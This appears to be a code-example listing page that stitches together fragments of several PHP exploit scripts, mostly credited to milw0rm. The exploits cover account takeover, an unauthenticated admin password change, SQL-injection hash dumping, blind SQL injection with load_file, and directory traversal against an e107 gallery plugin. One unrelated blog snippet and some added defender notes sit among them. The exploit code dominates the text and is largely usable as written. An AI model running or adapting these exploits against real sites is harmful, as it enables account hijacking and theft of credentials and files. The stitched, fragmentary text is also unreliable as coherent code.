sendpacket($packet2);
    if (stristr($html, 'i=1') == true) {
        die('Error : Incorrect username or password! Try 
again!');
    } else {
        if (stristr($html, 'i=5') == true) {
            die('Error : Someone is currently using that account!');
        } else {
            $RandMail = substr($PHPSESSID, 10, 6) . '*****@*****.**';
        }
    }
    $Query3 = $path . 'index.php?n=modules/panel&a=2&tmp[authorization]=4';
    $packet3 = "POST \n{$Query3}&editpassword=&editpassword2=&editemail={$RandMail}&edittemplate=default&editurl=&editflag=none&editday=0&editmonth=0&edityear=0&edithideemail=0&editcalendarbday=0&editmsn=&edityahoo=&editicq=&editaim=&editskype=&editsignature=&editaboutme=&PHPSESSID={$PHPSESSID} \nHTTP/1.1\r\n";
    $packet3 .= "User-Agent: Shareaza v1.x.x.xx\r\n";
    $packet3 .= "Host: " . $host . "\r\n";
    $packet3 .= "Connection: Close\r\n\r\n";
    sendpacket($packet3);
    if (stristr($html, 'i=26') == false) {
        die('Exploit Failed');
    }
    $Query4 = $path . 'index.php?n=modules/login&a=1';
    $packet4 = "POST {$Query4}&PHPSESSID={$PHPSESSID} HTTP/1.1\r\n";
    $packet4 .= "User-Agent: Shareaza v1.x.x.xx\r\n";
    $packet4 .= "Host: " . $host . "\r\n";
    $packet4 .= "Connection: Close\r\n\r\n";
    sendpacket($packet4);
    die('Exploit succeeded! You have Full access now!');
}
?>

Exemplo n.º 2
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="State"

aaaaaa
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="Country"

Iran
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="Status"

Active
-----------------------------7d6224c08dc
';
// Reviewer summary: this run builds one raw HTTP/1.0 POST to
// admin/editusers.php?Uid=<uid> with a multipart/form-data body ($data, which
// is assembled above this excerpt) and hands it to sendpacket().
// $p, $uid and $host are also defined outside the visible lines.
//
// Defender notes:
// - The request as built here carries no Cookie or Authorization header, so it
//   can only change anything if the admin script processes the form without
//   checking for an authenticated administrator session. Presumably that
//   missing server-side check is the flaw; confirm against the application.
// - Mitigation: enforce authentication and authorization at the top of every
//   script under admin/, not only on the page that links to it.
// - Detection: POST requests to admin/editusers.php that arrive without a
//   session cookie, or with a Uid that differs from the session's own user.
echo "Powered By Y! Underground Group\r\n";
echo "discovered&Coded By Dj7xpl\r\n";
echo "Sending Data To Target ...\n";
/*Sending Data*/
// Request line: the record to edit is selected by the Uid query parameter.
$packet = "POST " . $p . "admin/editusers.php?Uid=" . $uid . " HTTP/1.0\r\n";
// The boundary must match the delimiter lines used inside $data.
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\r\n";
// strlen() counts bytes, which is what Content-Length requires.
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
$packet .= $data;
// The response is not inspected here; the script does not verify the outcome.
sendpacket($packet);
sleep(1);
echo "Change Passw0rd Now!\n";
?>

# milw0rm.com [2007-04-30]
Exemplo n.º 3
    $sql = " FROM forum_userdata WHERE user_name='" . $username . "'/*";
    $sql = urlencode($sql);
    if ($proxy == '') {
        $packet = "GET " . $path . "search.php?search=" . $sql . "&ao=phrase HTTP/1.1\r\n";
    } else {
        $packet = "GET http://" . $host . $path . "search.php?search=" . $sql . "&ao=phrase HTTP/1.1\r\n";
    }
    $packet .= "Client-IP: 127.0.0.1\r\n";
    $packet .= "X-Forwarded-For: 127.0.0.1\r\n";
    $packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
    $packet .= "Referer: http://" . $host . $path . "search.php\r\n";
    $packet .= "Accept-Language: en\r\n";
    $packet .= "Accept-Encoding: gzip, deflate\r\n";
    $packet .= "User-Agent: Baiduspider+(+http://www.baidu.com/search/spider.htm)\r\n";
    $packet .= "Host: " . $host . "\r\n";
    $packet .= "Connection: Keep-Alive\r\n\r\n";
    show($packet);
    sendpacket($packet, 0);
    $temp = explode(';<span class="category">(', $html);
    $temp2 = explode(')</span>', $temp[1]);
    $hash = $temp2[0];
    echo '<br>username: '******' hash: ' . $hash;
    # debugging...
    //echo htmlentities($html);
} else {
    echo '<br>fill in all requested fields, optionally specify a proxy...<br>';
}
?>

# milw0rm.com [2005-09-22]
Exemplo n.º 4
/**
 * Prints $msg, then issues one GET request per (position, candidate character
 * code) pair against index.php?cmd=blog&post=1<fragment> and echoes the
 * character whose response is longer than 429 bytes.
 *
 * Reviewer notes (defensive reading):
 * - The `post` query parameter is given an appended SQL fragment, so the target
 *   evidently concatenates that parameter into a query. This is boolean-based
 *   blind SQL injection with response length as the true/false signal.
 * - Mitigation on the application side: bind `post` as a parameter in a
 *   prepared statement (or cast it to an integer) before it reaches the query,
 *   and run the database account without FILE privilege so load_file() is
 *   unavailable to the web application.
 * - Detection: bursts of near-identical requests to cmd=blog where `post`
 *   contains SQL keywords (limit, load_file) and only a trailing number changes
 *   between requests.
 *
 * @param string $p     prefix placed before index.php in the request line;
 *                      presumably the application's base path (confirm with caller)
 * @param string $msg   text echoed before the loop starts
 * @param string $tsqli SQL fragment template that each request completes
 * @return void         nothing is returned; recovered characters are echoed
 */
function getlogindetails($p, $msg, $tsqli)
{
    echo $msg;
    $tempvar = "";
    // $j is the 1-based character position being tested.
    $j = 1;
    // Outer loop runs while $tempvar contains no NUL byte.
    while (!strstr($tempvar, chr(0))) {
        // $i walks the candidate character codes 1..126.
        for ($i = 1; $i <= 126; $i++) {
            // `!` binds tighter than `==`: this branch is taken when strpos()
            // returns false (no "load_file" in the template) or 0.
            if (!strpos($tsqli, "load_file") == true) {
                $sqli = $tsqli . "+limit+0,1)," . $j . ",1))='" . $i;
            } else {
                $sqli = $tsqli . ")," . $j . ",1))='" . $i;
            }
            $packet = "GET " . $p . "index.php?cmd=blog&post=1" . $sqli . " HTTP/1.1\r\n";
            // NOTE(review): $host is not a parameter or local of this function.
            $packet .= "Host: " . $host . "\r\n";
            $packet .= "Connection: Close\r\n\r\n";
            $html = sendpacket($packet);
            // 429 is a fixed response-length threshold; presumably measured
            // against one specific installation -- it is not derived here.
            if (strlen($html) > 429) {
                echo chr($i);
                break;
            } elseif ($i === 126) {
                // No candidate matched at this position; an empty string is appended.
                $tempvar .= "";
                break;
            }
        }
        $j++;
    }
}
Exemplo n.º 5
         $DB->unbuffered_query("UPDATE {$db_prefix}statistics SET article_count=article_count" . $query . "1");
         $DB->unbuffered_query("UPDATE {$db_prefix}users SET articles=articles" . $query . "1 WHERE userid='{$sax_uid}'");
     }
     archives_recache();
     hottags_recache();
     categories_recache();
     statistics_recache();
     newarticles_recache();
     if ($pingurl && $pingagain) {
         $pingurldb = explode("\n", $pingurl);
         foreach ($pingurldb as $pingurl) {
             $pingurl = trim($pingurl);
             if ($pingurl) {
                 $url = str_replace('show&id', 'show&amp;id', getpermalink($article['articleid'], $article['alias']));
                 $data = 'url=' . rawurlencode($url) . '&title=' . rawurlencode($article['title']) . '&blog_name=' . rawurlencode($options['name']) . '&excerpt=' . rawurlencode($article['content']);
                 $result = sendpacket($pingurl, $data);
                 /*
                 					if (strpos($result, 'error>0</error')) {
                 						//succ
                 					} else {
                 						//fa
                 					}*/
             }
         }
     }
     if ($article['stick'] != $stick) {
         stick_recache();
     }
     $location = getlink('article', 'mod', array('message' => 13, 'articleid' => $articleid));
 }
 header("Location: {$location}");
Exemplo n.º 6
[o] Greetz [o]
==============
MainHack BrotherHood [ http://news.serverisdown.org ]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
F**K TERORIS!!
*/
// Reviewer summary: a small web form that requests
// /e107_plugins/my_gallery/image.php with a `file` parameter made of a long
// "/.." run followed by a file name, then prints the raw response.
//
// Defender notes:
// - Vulnerability class: directory traversal / arbitrary file read through the
//   `file` parameter of image.php.
// - Mitigation in the plugin: resolve the requested name with realpath(),
//   reject it unless the result lies inside the gallery directory, and prefer
//   mapping an image id to a stored path over accepting a path from the client.
// - Detection: requests to e107_plugins/my_gallery/image.php whose `file`
//   value contains "../" sequences, plain or URL-encoded.

// Request path of the plugin script, ending in its `file` query parameter.
$vuln = '/e107_plugins/my_gallery/image.php?file=';
// Fifteen parent-directory segments, placed before the requested file name.
$trasv = '/../../../../../../../../../../../../../../..';
// The form is opened here and closed by the final echo below.
echo "<form method=POST>\nWeb 2 XPL : <input type=\"text\" name=\"host\" size=30>\nFile 2 Read : <input type=\"text\" name=\"file\" size=30>\n<input type=submit value=\"Go!!!\" name=\"_xpl\">\n<br><br>";
// Runs only when the submit button field is present in the POST body.
if ($_POST['_xpl']) {
    // NOTE(review): $data, $file and $host are not assigned in the visible lines.
    $data .= "GET /{$vuln}{$trasv}{$file} HTTP/1.1\r\n";
    $data .= "Host: {$host}\r\n";
    $data .= "Connection: close\r\n\r\n";
    $html = sendpacket($host, $data);
    // The response is untrusted remote content; it is HTML-escaped before output.
    print '<pre>' . htmlspecialchars($html) . '</pre>';
}
echo "</form>";
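/**
 * Opens a TCP connection to $host on port 80, writes $data verbatim and
 * returns everything the peer sends until it closes the connection.
 *
 * The returned text is raw, untrusted network input (status line, headers and
 * body together); callers must escape it before placing it in HTML.
 * No read timeout is configured here, so the default socket timeout applies.
 *
 * Terminates the script with die() when the connection cannot be opened.
 *
 * @param string $host host name or address to connect to
 * @param string $data complete request bytes to send
 * @return string      the raw response, or '' when the peer sent nothing
 */
function sendpacket($host, $data)
{
    if (!($sock = @fsockopen($host, 80))) {
        die("[!] Connection refused, try again!\n");
    }
    // Start from an empty string: the original appended to an undefined
    // variable, which raises a warning and returns null on an empty reply.
    $html = '';
    fputs($sock, $data);
    while (!feof($sock)) {
        $line = fgets($sock);
        // fgets() returns false on a read error; stop rather than keep polling.
        if ($line === false) {
            break;
        }
        $html .= $line;
    }
    fclose($sock);
    return $html;
}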